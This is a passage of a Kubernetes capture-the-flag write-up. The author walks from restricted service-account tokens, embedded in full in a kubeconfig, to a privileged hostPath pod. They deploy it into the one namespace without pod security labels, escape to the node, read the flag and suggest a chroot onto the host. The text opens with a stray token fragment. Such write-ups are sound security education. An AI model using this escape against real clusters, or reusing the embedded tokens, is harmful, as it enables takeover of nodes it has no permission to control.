9XF-ZEQSZY-CmS1MSURptFVkTFXZG5M5Gru7ORWvIJ-HMDewgG96vcgE6llLmACH5W-zzgEMEpFR-EW5VYjmwbX_70oZRs1Br6ggvJMrd0_mG6mtM_IsGFlNeN544WmSQ
Once again, we extend our kubeconfig to add the new service account token:
apiVersion: v1
clusters:
- cluster:
server: https://hello-world.tld:32769
insecure-skip-tls-verify: true
name: redguard
contexts:
- context:
cluster: redguard
user: restricted-viewer
name: restricted-viewer
- context:
cluster: redguard
user: pod-executer
name: pod-executer
- context:
cluster: redguard
user: pod-creator
name: pod-creator
current-context: pod-creator
kind: Config
preferences: {}
users:
- name: restricted-viewer
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjE4Mzg1LCJpYXQiOjE3MTc2ODIzODUsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiOTBlMDQ2MDQtNDMxOS00ZmM3LWExODMtZWJkMTI1YmRlY2YyIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6ImRpc2VuY2hhbnQtdnVsbmVyYWJsZS1hcHAtZGVtby1vbi1wdWJsaWMtZG9ja2VyLWh1Yi01Njc2NTRoYmtmciIsInVpZCI6IjdiMzgzY2E5LWE3OGMtNDJjMS04OWQ0LWI0N2I1NWJhMWI0ZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoicmVzdHJpY3RlZC12aWV3ZXIiLCJ1aWQiOiJkZTJjYjBlMy1mMTQyLTQzNzctYjY1ZC05NDZlMWRmYWMxNmYifSwid2FybmFmdGVyIjoxNzE3Njg1OTkyfSwibmJmIjoxNzE3NjgyMzg1LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YXBwbGljYXRpb25zOnJlc3RyaWN0ZWQtdmlld2VyIn0.Kq83s1lTYxWfJVMDxOuAQr5l5Ca5SSjSTaNuuOuk-SVolizCa38ud_HuvsaB_s36iNm31rcY8LFYqSdX8G5nZBIPhMyVBaAJchI4JVeG0Z8C4Xhhefcg9FtDrIFHgE6MnzWSnCCHw60boH8Sof65kx0R1IUPDSS3qOif4jon2caEYvFsGeDeCtOtnWdv-XqkKPF0APs-KA1yGad1yK9MOzidvJzog3v4D6pwpdD1jgKbu9TDXZu5s_hNfb9-ZmTjV7cxfaJvwLR1Ux0biwIKe3uG30Bd2lrBMpUteiQNtgQSkBEX17-TPOgtal8Xg8-QCZ-L8IRRaEVdiJXdkgmuWw
- name: pod-executer
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjI3MTM3LCJpYXQiOjE3MTc2OTExMzcsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiYTNjOGNlNzYtZGJiMi00ODNlLWIyYWQtYTk2MDE1YmMyNzI2Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6Im9wZW5zc2gtc2VydmVyLTZkNGI4NWY5NzkteGhubXQiLCJ1aWQiOiI0OWNhZDk0ZC1mMDBkLTQxMmUtODNlMi1jMWEyY2JmNmNiZmUifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6InBvZC1leGVjdXRlciIsInVpZCI6IjFiYzVhNTk0LWI1ZWEtNDI2My1hZDQzLWU2NDg5N2RkZTEzMSJ9LCJ3YXJuYWZ0ZXIiOjE3MTc2OTQ3NDR9LCJuYmYiOjE3MTc2OTExMzcsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDphcHBsaWNhdGlvbnM6cG9kLWV4ZWN1dGVyIn0.KCJXe0l8NpouCpCsKIIzkGYL1kZKtqbOrkTu4BBfHR2c94pgIBBD3TzwylOhMDZLw1acMWGZmAlpsNFUIxIh_EapbarXyIEisAPnyqZlyuGnPQbOBCpMvyXom8RmVOpF2fqqPyHrPaHb_DpIBAnbU03nVh9CzqXeYM84stuh6juP1W5BE1xL7ggQeZOvlZTMExcHkzpNmBtC9h7RAXU9-U-rGNnXNiw9HSdOBE1hk-fJVeKH8qZzdgr62D-HJYir1wk7685PJ9w38CLi2nAKdyDhV3MNyNH2XaZKn8MFXM-bAFqfXxwQ3MFQe8uB41JAD3Gj4zCrrUN5Nm0BsF1CUQ
- name: pod-creator
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjI3MjE2LCJpYXQiOjE3MTc2OTEyMTYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiY2YzMDNkNjEtZDI1Yy00ZGRkLTlkMzMtNWNhNWM0MzBhZWUxIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwibm9kZSI6eyJuYW1lIjoiaGFjay1tZS1tMDIiLCJ1aWQiOiI0YWYyMTJlZS01NDAzLTQxODktYmU3Yi1hOTVhNDE2ZDMxNDcifSwicG9kIjp7Im5hbWUiOiJ0aGUtcHJpbmNlc3MtaXMtaW4tYW5vdGhlci1uYW1lc3BhY2UiLCJ1aWQiOiIyZGVkM2Q2Zi0xMjBhLTQ2ZmEtODYxMS1mZjYyOWZmNTdlMjIifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6InBvZC1jcmVhdG9yIiwidWlkIjoiZmI4ZWU2NTUtYzIwMS00ZTUxLTk0YjAtMjE5MDdiZGIyOWI4In0sIndhcm5hZnRlciI6MTcxNzY5NDgyM30sIm5iZiI6MTcxNzY5MTIxNiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6cG9kLWNyZWF0b3IifQ.eocZ2wPoF64CbkXIW7TRQIRpsUwP0QMfQLMixuJJDPPuq62b1JWZrmIEIZM8_di1HES1xmeuS7xCc6YaOSK-SQ94APP5cb_CUzYzzQGjn4PyVmMPSzYVYUZJI3oj2hEb4-6V8LdfnaOg8QO79uU5NdAmMDENiR3Qt-Atz4YOpWM3cngfFqiPwIGXKxHB5tjqK87CcpK2XSc8g-cm4Fe5y9XF-ZEQSZY-CmS1MSURptFVkTFXZG5M5Gru7ORWvIJ-HMDewgG96vcgE6llLmACH5W-zzgEMEpFR-EW5VYjmwbX_70oZRs1Br6ggvJMrd0_mG6mtM_IsGFlNeN544WmSQ
Let’s check the permissions:
kubectl auth can-i --list
Unsurprisingly, we are now allowed to create pods!
Resources Non-Resource URLs Resource Names Verbs
pods [] [] [create get list]
pods/exec [] [] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods/log [] [] [get list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
To escape from the container onto the underlying node, we deploy a new pod that runs a privileged container with the host filesystem mounted into it:
apiVersion: v1
kind: Pod
metadata:
name: ubuntu
labels:
app: ubuntu
spec:
# Node that the container must run on
nodeName: hack-me
containers:
- image: ubuntu
command:
- "sleep"
- "3600"
imagePullPolicy: IfNotPresent
name: ubuntu
securityContext:
allowPrivilegeEscalation: true
privileged: true
runAsUser: 0 # run as root
volumeMounts:
- mountPath: /host
name: host-volume
restartPolicy: Never
hostIPC: true # Use the host's ipc namespace
hostNetwork: true # Use the host's network namespace
hostPID: true # Use the host's pid namespace
volumes:
- name: host-volume
hostPath:
path: /
We try to create the pod using kubectl, but it fails:
kubectl apply -f pod.yaml
This is the error we get:
Error from server (Forbidden): error when creating "pod.yaml": pods "ubuntu" is forbidden: violates PodSecurity "baseline:latest": host namespaces (hostNetwork=true, hostPID=true, hostIPC=true), hostPath volumes (volume "host-volume"), privileged (container "ubuntu" must not set securityContext.privileged=true)
This tells us that the pod security admission labels have been set on the namespace that we are trying to deploy our pod into. Luckily, we can list all namespace labels as the restricted-viewer user:
kubectl get ns -o yaml
As we can see, the only namespace that has no pod-security.kubernetes.io label set is test:
apiVersion: v1
items:
- apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: "2024-06-06T13:59:42Z"
labels:
kubernetes.io/metadata.name: applications
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
name: applications
- apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: "2024-06-06T13:58:05Z"
labels:
kubernetes.io/metadata.name: default
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
- apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/name: ingress-nginx
kubernetes.io/metadata.name: ingress-nginx
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
name: ingress-nginx
- apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: "2024-06-06T13:59:41Z"
labels:
kubernetes.io/metadata.name: jobs
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
name: jobs
- apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: "2024-06-06T13:58:05Z"
labels:
kubernetes.io/metadata.name: kube-node-lease
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
name: kube-node-lease
- apiVersion: v1
kind: Namespace
metadata:
labels:
kubernetes.io/metadata.name: kube-public
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
name: kube-public
- apiVersion: v1
kind: Namespace
metadata:
labels:
kubernetes.io/metadata.name: kube-system
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
name: kube-system
- apiVersion: v1
kind: Namespace
metadata:
labels:
kubernetes.io/metadata.name: test
name: test
kind: List
metadata:
resourceVersion: ""
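Rather than reading through the full YAML, the enforce label can also be displayed as a dedicated column, which makes the unlabelled test namespace stand out immediately; a sketch:
# show the pod security enforce label next to each namespace
kubectl get namespaces -L pod-security.kubernetes.io/enforce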
Therefore, creating our privileged pod succeeds if we deploy it into the test namespace:
kubectl apply -f pod.yaml -n test
After successfully creating the pod, we can then exec into it:
kubectl exec -it -n test ubuntu -- bash
We can now successfully read the flag!
root@hack-me:~# ls /host/root/
flag.txt
root@hack-me:~# cat /host/root/flag.txt
K8S-CTF-FLAG-9942f87de3d211328c5d206be2be7090
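Since the pod runs privileged, shares the host namespaces, and has the node’s root filesystem mounted at /host, this effectively gives us full control over the master node; for example, we could chroot into the host filesystem and work on the node directly (a sketch):
# pivot from the container into the host's root filesystem
chroot /host /bin/bash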
It’s very rare to see a CTF challenge about kubernetes, so when I saw that RedGuard had one for the Area41 conference, I immediately had to try and solve it!
I first heard about the challenge from this linkedin post, as sadly I was not able to attend the conference.
All in all, it took me about three hours to solve the challenge. I really liked the difficulty level, and that essentially no guessing was needed to proceed from one step of the chain to the next on the way to the flag.